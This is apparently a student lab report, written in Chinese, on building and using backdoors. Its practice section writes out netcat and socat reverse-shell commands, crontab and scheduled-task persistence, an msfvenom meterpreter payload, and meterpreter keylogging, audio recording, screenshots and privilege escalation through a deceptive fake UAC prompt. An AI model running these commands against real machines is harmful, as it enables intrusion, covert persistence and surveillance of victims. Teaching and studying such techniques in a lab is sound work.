20155339平措卓瑪 Exp2 後門原理與實踐

20155339平措卓瑪Exp2 後門原理與實踐

基礎問題

(1)例舉你能想到的一個後門進入到你係統中的可能方式?
答:下載並安裝某個程序,這個程序能夠正常的而且完整的爲咱們提供服務,可是在開發改程序時可能會設計了一個後門,咱們安裝程序的過程當中也將該後門也裝入了咱們的系統中。linux

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
答:win:做爲一個程序、一個可執行文件,當咱們在運行該程序或者該可執行文件時,後門就能夠被開啓;在本次試驗中還有經過設置Windows->控制面板->管理工具->任務計劃程序,新建任務來實現後門的開啓。 Linux:經過crontab定時任務來啓動。web

(3)Meterpreter有哪些給你映像深入的功能?
答:一旦控制了靶機,那麼Meterpreter的功能很是強大,不止系統命令、核心命令,甚至還有一些用戶接口,並且若是沒有殺毒軟件很是容易使用,也就是說稍微進行提高,那麼殺毒軟件也檢測不出來,很是容易被攻擊,一旦被攻擊,能夠經過擊鍵記錄獲取我的信息,如密碼、身份證號碼等等,還可使用攝像頭,電視劇裏用攝像頭監視別人的橋段居然能夠這麼簡單的實現,太危險了。shell

(4)如何發現本身有系統有沒有被安裝後門?
答:首先一些殺毒軟件的安裝仍是很是重要,低端的後門能夠被系統的防火牆、殺毒軟件還有入侵檢測系統均可以查出;高端一點的後門應該就要下載專門的檢測工具了,同時在上網搜索的過程當中,發現了一種方法,在這裏分享給你們,點擊跳轉windows

實驗總結與體會

此次實驗頗有趣,過了一把當「黑客」的癮,可是與此同時讓我有了不少擔心,看起來很是安全的電腦潛藏着這麼多危險,不經意間下載的一個軟件可能就會讓你的信息毫無藏身之處,信息化的時代帶來了不少便捷與此同時一些安全問題也的確不容忽視。安全

實踐過程記錄

Win得到Linux Shell

  • 首先檢查環境與配置,此處咱們用的是netcat, 是一個底層工具,進行基本的TCP UDP數據收發。常被與其餘工具結合使用,起到後門的做用。
    1.Linux: 通常自帶netcat,"man netcat" 或"man nc"可查看其使用說明。
    2.Windows:須要載ncat.rar解壓便可使用。
  • 進入ncat目錄,Windows打開監聽:ncat.exe -l -p 5339
    其中-l是監聽-p是端口,此處我開啓的是本機5339號端口。
  • Linux反彈鏈接win:nc 172.30.1.92 5339 -e /bin/sh,此處IP地址爲主機的IP地址。
  • windows下得到一個linux shell,能夠運行指令進行操做,例如ls,cd等,結果以下圖:

Linux得到Win Shell

  • Linux運行監聽指令:nc -l -p 5339
  • Windows反彈鏈接Linux:ncat.exe -e cmd.exe ip_of_linux 5339
  • Linux下就能夠看到Windows的命令提示,以下圖所示:

使用netcat獲取主機操做Shell,cron啓動

  • Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令。詳細說明能夠"man cron"。
  • crontab指令增長一條定時任務:crontab -e,其中-e表示編輯。
  • 由於是第一次編輯,因此咱們須要選擇編輯器,此處咱們選擇3,而且添加一行:20 * * * * /bin/netcat 172.30.1.92 5339 -e /bin/sh,(該指令是在每一個小時的第20分鐘執行後面的指令)保存並退出,配置生效,能夠經過crontab -l來查看。當我在主機172.30.1.92的5339端口用nc偵聽,那麼到了第20分時就會得到虛擬機的shell,結果以下:

使用socat獲取主機操做Shell,任務計劃啓動。

  • 下載socat。tcp

  • Windows->控制面板->管理工具->任務計劃程序->建立任務,觸發器設置爲工做站鎖定時以及對全部用戶(以下圖)。
    編輯器

  • 在操做中的程序或腳本里選擇下載的socat.exe的路徑,添加參數中填入tcp-listen:5339 exec:cmd.exe,pty,stderr,該命令把cmd綁定到5339端口,同時把cmd的Stderr復位到stdout(以下圖)。 工具

  • 按win+L鍵鎖定計算機,再次開啓,以前建立的任務已經開始運行了。測試

  • 在Kali中輸入socat - tcp:172.30.1.92:5339,就能夠得到靶機的shell了,以下圖所示:
    url

使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell。

  • 生成20155339.exe,在Kali中使用命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=5339 -f exe > 20155339.exe ,其中IP爲Kali的IP地址,稍做等待就會生成20155339.exe後門文件。

  • 將其經過nc,傳送到主機,在Windows中使用命令ncat.exe -l 5339 > 20155339.exe,在Kali中使用命令:。 nc 172.30.1.92 5339 < 20155339.exe,這樣就傳送過來了。

  • 爲了驗證是否必須在傳送的目錄才能夠,我將其轉移到另一個目錄下,因此如下實驗我是在另外一個盤裏面弄的,經驗證在別的目錄下也是能夠的。

  • 在Kali中輸入以下命令:msfconsole,set payload windows/meterpreter/reverse_tcp,show options獲得下圖所示:

  • 能夠看到IP和端口都須要設置(由於此處的IP和端口須要與上面生成後門文件時的一致。因此set LHOST 192.168.224.129,set LPORT 5339,再次show options,獲得以下圖所示,即正確:

  • 輸入exploit

  • 在Windows中雙擊運行20155339.exe,Kali獲得shell,用dir命令測試,獲得以下圖所示:

使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權。

-記錄擊鍵,keyscan_start開始記錄,keyscan_dump顯示出擊鍵內容,keyscan_stop中止記錄,記錄成功。

  • screenshot命令用於截圖,截圖成功。

  • record_mic命令用於錄製音頻,錄製成功。

  • webcam_snap拍攝,可是未成功。

  • getsystem指令進行提權。

實驗過程當中遇到的問題

  • 在剛開始實驗的時候打開了8888端口,監聽的也是8888端口,可是一直失敗。
  • 解決方法:將端口改成5339就成功了。
  • 在使用crontab指令增長一條定時任務時,一直不成功。
  • 解決方法:將定時任務指令加在第一行而不是最後一行,再次嘗試就能夠了。
  • 任務計劃一直沒法運行。
  • 解決方法:win+L快捷鍵使主機鎖定再次進入就運行了。
  • 使用MSF meterpreter沒法獲取目標主機視頻,沒法進行提權操做。
  • 解決方法:1.對於沒法獲取視頻,詢問了同窗,也上網進行搜索,嘗試了各類方法,仍然不行,下圖是嘗試的部分截圖,我盡力了,老師。2.對於提權,對網上的多個內容進行了搜索,當運行getsystem命令時,若是出現...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).,則說明自動提權成功,當這種命令下出現異常,則說明須要遷移到一個以SYSTEM系統權限運行的進程中,這樣就有不少方法,方法一就是能夠利用溢出漏洞模塊提權,如ms13_053,ms14_058,ms16_016,ms16_032等,用windows提權漏洞提權時,會直接返回高權限meterpreter shell,因此不須要再執行getsystem命令;方法二是AlwaysInstallElevated提權,AlwaysInstallElevated是微軟容許非受權用戶以SYSTEM權限運行安裝文件(MSI)的一種設置,還有一個方法就是用exploit/windows/local/ask,模擬一個UAC確認窗口,欺騙用戶點擊,從而獲取權限。這裏我將應用程序的名字(FILENAME參數)設置成爲「WechatUpdater」,比較引誘你們點擊,具體步驟以下圖3,這個過程當中Windows會收到下圖4所示窗口,須要點擊確認。

相關文章
相關標籤/搜索